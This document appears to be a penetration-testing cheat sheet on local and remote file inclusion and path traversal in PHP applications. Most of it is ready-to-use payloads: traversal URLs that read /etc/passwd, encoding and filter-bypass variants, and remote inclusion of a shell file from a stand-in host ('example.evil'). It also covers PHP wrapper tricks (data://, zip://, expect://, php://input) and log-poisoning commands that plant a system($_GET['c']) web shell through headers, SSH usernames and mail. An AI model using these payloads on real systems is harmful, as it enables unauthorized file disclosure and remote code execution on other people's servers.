File Inclusion and Path Traversal #
At a Glance #
File Inclusion #
File inclusion is the method for applications, and scripts, to include local or remote files during run-time. The vulnerability occurs when an application generates a path to executable code using an attacker-controlled variable, giving the attacker control over which file is executed.
There are two different types. Local File Inclusion (LFI) where the application includes files on the current server. And Remote File Inclusion (RFI) where the application downloads and execute files from a remote server. 1
Path Traversal #
A path, or directory, traversal attack consists of exploiting weak validation, or sanitization, of user-supplied data allowing the attacker to read files, or directories, outside the context of the current application.
The use of these techniques may lead to information disclosure, cross-site-Scripting (XSS), and remote code execution (RCE).2
LFI #
Basic LFI #
Absolute Path Traversal #
http://example.com/index.php?page=/etc/passwd
Relative Path Traversal #
http://example.com/index.php?page=../../../etc/passwd
Null Byte #
Sometimes applications append extra characters, like file extensions, to the input variable. A null byte will make the application ignore the following characters.
http://example.com/index.php?page=../../../etc/passwd%00
Note: PHP fixed the issue in version 5.3.4. https://bugs.php.net/bug.php?id=39863
Dot Truncation #
In PHP, filenames longer than 4096 bytes will be truncated and, characters after that, ignored.
http://example.com/index.php?page=../../../etc/passwd................[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../../etc/passwd
Note:
In PHP:
/etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/
Encoding #
Manipulating variables that reference files
with “dot-dot-slash" (../) sequences and its variations,
or using absolute file paths,
may allow bypassing poorly implemented input filtering.
3
| URL | Double URL | UTF-8 Unicode | 16 bits Unicode | |
|---|---|---|---|---|
. | %2e | %252e | %c0%2e %e0%40%ae %c0%ae | %u002e |
/ | %2f | %252f | %c0%2f %e0%80%af %c0%af | %u2215 |
\ | %2c | %252c | %c0%5c %c0%80%5c | %u2216 |
Encoded ../
#
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
Encoded ..\
#
%2e%2e%2c
%252e%252e%252c
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2216
Double URL Encoding #
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
UTF-8 Encoding #
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
Bypass Filtering #
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Bypass ../ removal
#
..././
...\.\
Bypass ../ replaced with ;
#
..;/
http://example.com/page.jsp?include=..;/..;/sensitive.txt
Windows UNC Share 4 #
Windows UNC shares can be injected to redirect access to other resources.
\\localhost\c$\windows\win.ini
RFI #
Most filter bypassing techniques for LFI can be used for RFI.
Basic RFI #
http://example.com/index.php?page=http://example.evil/shell.txt
Null Byte #
http://example.com/index.php?page=http://example.evil/shell.txt%00
Bypass http(s):// removal
#
hhttp://thttp://thttp://phttp://:http://http:///http:///
hhttps://thttps://thttps://phttps://shttps://:https:///https:///https://
Bypass allow_url_include
#
On Windows,
it is possible to bypass disabled allow_url_include and allow_url_fopen
by using SMB.
Simply including a script
located in an open share.
http://example.com/index.php?page=\\10.0.0.1\share\shell.php
PHP Stream Wrappers #
PHP provides many built-in wrappers
for various protocols,
to use with file functions
such as fopen, copy, file_exists,
and filezise.
5
php://filter #
php://filter is a kind of meta-wrapper
that allows filtering a stream
before the content is read.
The resulting data
is the encoded version
of the given file’s source code.
Note:
Multiple filter chains can be specified on one path,
chained using | or /.
string.rot13. #
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
convert.base64. #
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
convert.base64. #
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
Base64 decode and gzip inflate. #
The resulting encoded string can be decoded and inflated by piping it into the following PHP script:
echo [BASE64-STR] | php -r 'echo gzinflate(base64_decode(file_get_contents("php://stdin")));'
zip:// #
zip:// is a wrapper for zip compression streams.
To leverage the zip functionalities,
upload a zipped PHP script to the server
(with the preferred extension)
and decompress in the server
using the zip://<zipfile>#<file>,
being <file> the resulting decompressed file.
echo -n '<?php system($_GET['c']); ?>' > shell.php
zip shell.jpg shell.php
http://example.com/index.php?page=zip://shell.jpg%23shell.php
data:// #
data:// is a wrapper for RFC2397,
or data:// scheme.
The scheme allows the inclusion of small data items
as if it had been included externally.
6
PHP Shell Script.
echo -n '<?php system($_GET['c']); ?>' | base64
PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=ls
expect:// #
expect:// wrapper provide access to processes'
stdio, stdout and stderr
via PTY.
http://example.com/index.php?page=expect://ls
php://input #
php://input is a read-only stream that allows to read raw data
from the request body.
curl -X POST --data "<?php echo shell_exec('ls'); ?>" "http://example.com/index.php?page=php://input%00" -v
The proc File System
#
The proc file system (procfs)
contains a hierarchy of special files
that represent the current state of the kernel.
It acts as an interface
to internal data structures in the kernel
for applications and users.
Because of its abstract properties, it is also referred to as a virtual file system.
File within this directory are listed as zero bytes in size, even though, can contain a large amount of data. 7
Process Directories #
The /proc directory contains
one subdirectory for each process
running on the system,
which is named
after the process ID (PID).
Concurrently,
each of these directories
contains files to store information
about the respective process.
8
/proc/self (/fs/proc/self.c) #
The /proc/self
represents the currently scheduled PID.
In other words,
a symbolic link
to the currently running process’s directory.
It is a self-referenced device driver, or module, maintained by the Kernel.
Useful /proc entries
#
/proc/version: Kernel version./proc/sched_debug: Scheduling information and running processes per CPU./proc/mounts: Mounted file systems./proc/net/arp: ARP table./proc/net/route: Routing table.proc/net/tcp/udp: TCP or UDP active connections./proc/net/fib_trie: Routing tables trie.9
Useful /proc/[PID] entries
#
/proc/[PID]/cmdlineProcess invocation command with parameters.It potentially exposes paths, usernames and passwords.
/proc/[PID]/environEnvironment variables.It potentially exposes paths, usernames and passwords.
/proc/[PID]/cwdProcess' current working directory./proc/[PID]/fd/[#]File descriptors.Contains one entry for each file which the process has open.
LFI2RCE - /proc #
/proc/self/environ #
/proc/self/environ contains user inputs
that turn it
in a useful volatile storage.
Apache stores an environment variable
for the HTTP_USER_AGENT header
to be used by
the self-contained modules.10
curl "http://example.com/index.php?page=/proc/self/environ&c=id" -H "User-Agent" --data "<?php system($_GET['c']); ?>"
/proc/[PID]/fd/[FD] 3 #
Upload A LOT of shells.
Include
http://example.com/index.php?page=/proc/$PID/fd/$fd.Bruteforce the process ID (
$PID) and file descriptor id ($FD)
LFI2RCE - Log Poisoning #
A log file is a file that contains a record of events from an application. A log poisoning attack consists of triggering one of these events with executable code as part of the logged data, and successively, through LFI, include and execute the code.
Note:
It is recommended to first load the target log, not only to verify the access but to identify what data is being stored.
Administrators can modify the logged data according to their needs.
Apache #
By default,
Apache maintains access and error logs.
The error log,
commonly,
register the Referer header,
while the acccess log,
the User-Agent.
11
Access Log #
Make a valid request
with the code in the User-Agent header.
curl -H 'User-Agent' --data "<?php system($_GET['c']); ?>" "http://example.com" -v
Error Log #
Make an invalid request,
an invalid inclusion for example,
with the suitable Referer header.
curl -H 'Referer' --data "<?php system($_GET['c']); ?>" "http://example.com/invalid#req" -v
Note:
The Apache logging API escapes strings going to the logs.
Use single quotes (')
since double quotes (") are replaced escaped as "quote";
LFI #
http://example.com/index.php?page=/path/to/access.log&c=id
Common Apache Log Paths #
Log files can also be set to custom locations, either globally, or domain based if virtual hosting is enabled.
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/usr/local/apache/log/access_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/access_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
SSH #
SSH logs the username of each connection. Create a connection to SSH with the suitable username.
ssh '<?php system('id'); ?>'@example.com
LFI #
http://example.com/index.php?page=/path/to/sshd.log&c=id
Common SSH Log Paths #
/var/log/auth.log
/var/log/sshd.log
Email #
Email an internal account, containing the script.
mail -s "<?php system($_GET['c']);?>" www-data@10.0.0.3 < /dev/null
LFI #
http://example.com/index.php?page=/var/mail/www-data&c=id
Further Reading #
- OWASP - Testing Directory Traversal File Include
- BSidesMCR 2018: It’s A PHP Unserialization Vulnerability Jim, But Not As We Know It by Sam Thomas
- PayloadsAllTheThings Intruders
Contributors to Wikimedia projects. “File Inclusion Vulnerability - Wikipedia.” Wikipedia, the Free Encyclopedia, Wikimedia Foundation, Inc., 24 Nov. 2006, https://en.wikipedia.org/wiki/File_inclusion_vulnerability. ↩︎
“Path Traversal - OWASP.” OWASP, https://wiki.owasp.org/index.php/Path_Traversal. ↩︎
swisskyrepo. “PayloadsAllTheThings / Directory Traversal.” GitHub, https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal. ↩︎
“CWE-40: Path Traversal: ‘\UNC\share\name\’ (Windows UNC Share) (4.1).” CWE - Common Weakness Enumeration, https://cwe.mitre.org/data/definitions/40.html. ↩︎
“PHP: Supported Protocols and Wrappers - Manual.” PHP: Hypertext Preprocessor, https://www.php.net/manual/en/wrappers.php. ↩︎
“RFC 2397 - The ‘Data’ URL Scheme.” IETF Tools, https://tools.ietf.org/html/rfc2397. ↩︎
“The /Proc Filesystem.” The Linux Kernel Documentation, https://www.kernel.org/doc/html/latest/filesystems/proc.html. ↩︎
“Proc(5) - Linux Manual Page.” Michael Kerrisk - Man7.Org, https://man7.org/linux/man-pages/man5/proc.5.html. ↩︎
Bernat, Vincent. “IPv4 Route Lookup on Linux ⁕ Vincent Bernat.” MTU Ninja Vincent Bernat, https://vincent.bernat.ch/en/blog/2017-ipv4-route-lookup-linux. ↩︎
“LFI2RCE (Local File Inclusion to Remote Code Execution) Advanced Exploitation: /Proc Shortcuts.” Ush.It - a Beautiful Place, https://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/. ↩︎
“Log Files - Apache HTTP Server Version 2.4.” Welcome! - The Apache HTTP Server Project, https://httpd.apache.org/docs/2.4/logs.html. ↩︎